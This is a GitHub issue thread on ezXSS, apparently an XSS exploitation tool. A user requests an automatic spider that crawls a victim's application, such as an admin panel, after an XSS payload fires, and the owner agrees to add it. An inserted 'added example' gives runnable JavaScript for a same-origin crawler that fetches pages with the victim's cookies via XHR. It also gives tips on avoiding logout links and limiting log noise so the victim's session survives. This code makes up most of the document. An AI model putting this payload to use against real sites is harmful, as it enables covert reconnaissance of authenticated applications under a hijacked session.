Feature request: Automatic spider #176

Open
dicksnel opened this issue Jul 18, 2024 · 4 comments

Comments

@dicksnel

Hi, thanks for this great tool!

It would be great if ezXSS could automatically spider an entire app after the XSS is triggered. This works by adding a hidden iframe and scanning the target page for all hyperlinks with the same domain. Then, for each found URL, fetch it via XHR in the iframe and extract all response data / screenshot it like a usual target page.

The advantage of this is that an attacker can gain immediate insight into all URLs and pages that are available in, for example, an admin panel.

If this is something to consider including, I have working code available from our own tooling.
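
As an added example of the same-origin crawl described above (not ezXSS code, and not the tooling Dick refers to), here is the link-collection and crawl-queue logic written so it runs outside a browser. The hidden iframe and the screenshotting are left out; the crawl itself only needs a function that fetches a URL with the victim's cookies, and in a payload that would be the synchronous XHR shown at the bottom. `SAMPLE_SITE`, `SKIP_PATH`, `spider`, `sampleFetch`, `xhrFetch` and the `app.example` host are assumptions for illustration, and the sample HTML is constructed input, not a real application.

```javascript
// Added example: same-origin spider in the spirit of the feature request above.
// Not ezXSS code. The crawl is written against an injected fetchFn so the same
// logic runs offline here and inside a payload in the browser.

// Constructed in-memory "site" used as sample input (hypothetical host app.example).
const SAMPLE_SITE = {
  "https://app.example/admin/": `
    <a href="/admin/users">Users</a>
    <a href="settings">Settings</a>
    <a href="https://app.example/admin/users#top">Users again</a>
    <a href="https://cdn.example/lib.js">CDN</a>
    <a href="/logout">Log out</a>
    <a href="mailto:admin@example">Mail</a>
    <a href="/admin/missing">Broken</a>`,
  "https://app.example/admin/users": `<a href="/admin/users?id=1">Alice</a><a href="/admin/">Home</a>`,
  "https://app.example/admin/settings": `<p>settings</p>`,
  "https://app.example/admin/users?id=1": `<p>Alice</p>`,
};

// Heuristic (assumed) list of paths a crawler riding the victim's session must
// never GET: requesting /logout or a delete action kills the session or changes state.
const SKIP_PATH = /\b(logout|signout|sign-out|delete|remove)\b/i;

// Collect unique same-origin http(s) URLs from an HTML string, fragments stripped.
// In the browser this would walk document.querySelectorAll('a[href]') in the
// iframe's DOM; a regex keeps the example runnable without a DOM.
function extractSameOriginLinks(html, pageUrl) {
  const base = new URL(pageUrl);
  const out = new Set();
  for (const m of html.matchAll(/href\s*=\s*["']([^"']+)["']/gi)) {
    let u;
    try { u = new URL(m[1], base); } catch { continue; }   // malformed href: ignore
    if (u.origin !== base.origin) continue;                  // SOP: cross-origin bodies are unreadable anyway
    if (!/^https?:$/.test(u.protocol)) continue;             // mailto:, javascript:, tel:
    if (SKIP_PATH.test(u.pathname)) continue;                // state-changing link, never request
    u.hash = "";                                             // fragment does not change the response
    out.add(u.href);
  }
  return [...out];
}

// Breadth-first crawl. fetchFn(url) returns {status, body}. maxPages bounds how
// many requests one payload makes (noise in the target's logs, and runtime).
function spider(startUrl, fetchFn, maxPages = 50) {
  const start = new URL(startUrl);
  start.hash = "";
  const queue = [start.href];
  const seen = new Set(queue);
  const results = {};
  while (queue.length && Object.keys(results).length < maxPages) {
    const url = queue.shift();
    const { status, body } = fetchFn(url);
    results[url] = { status, length: body.length, snippet: body.slice(0, 60) };
    if (Math.floor(status / 100) !== 2) continue;            // do not follow links out of error pages
    for (const link of extractSameOriginLinks(body, url)) {
      if (!seen.has(link)) { seen.add(link); queue.push(link); }
    }
  }
  return results;
}

// Offline stand-in for the browser fetch: serves the constructed site, 404 otherwise.
function sampleFetch(url) {
  const body = SAMPLE_SITE[url];
  return body === undefined ? { status: 404, body: "" } : { status: 200, body };
}

// Browser-side fetchFn as the request proposes (XHR). Synchronous so the crawl
// loop above stays simple; same-origin XHR sends the victim's cookies by default.
// Not executed in this example.
function xhrFetch(url) {
  const xhr = new XMLHttpRequest();
  xhr.open("GET", url, false);
  xhr.send();
  return { status: xhr.status, body: xhr.responseText };
}
```

Two things a practitioner would want from such a feature: a crawl that only issues GETs still changes state when it follows links like `/logout` or a one-click delete, so an exclude list (or a confirmation step) is not optional, and the page cap matters because every request lands in the target's access logs under the victim's session.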

@ssl
Owner

ssl commented Jul 21, 2024

Hey Dick,

Thanks for the feature request. This for sure sounds like something we can add. I would love for you to share the working code and possibly some ideas on how to implement this in ezXSS.

I can then look myself what would be the best way to implement this in the current system.

@dicksnel
Author

@ssl great, I'll get back with some example code after my holidays!

@ssl
Owner

ssl commented Oct 27, 2024

Hey @dicksnel! Hope you had a good holiday. Is this FR still something you would like to see in ezXSS? Let me know so I can implement it :)

@dicksnel
Author

Hi @ssl, I still have it on my list but can't find the time yet. Feel free to close the issue and I'll open a new one later on or a PR when I have things ready!
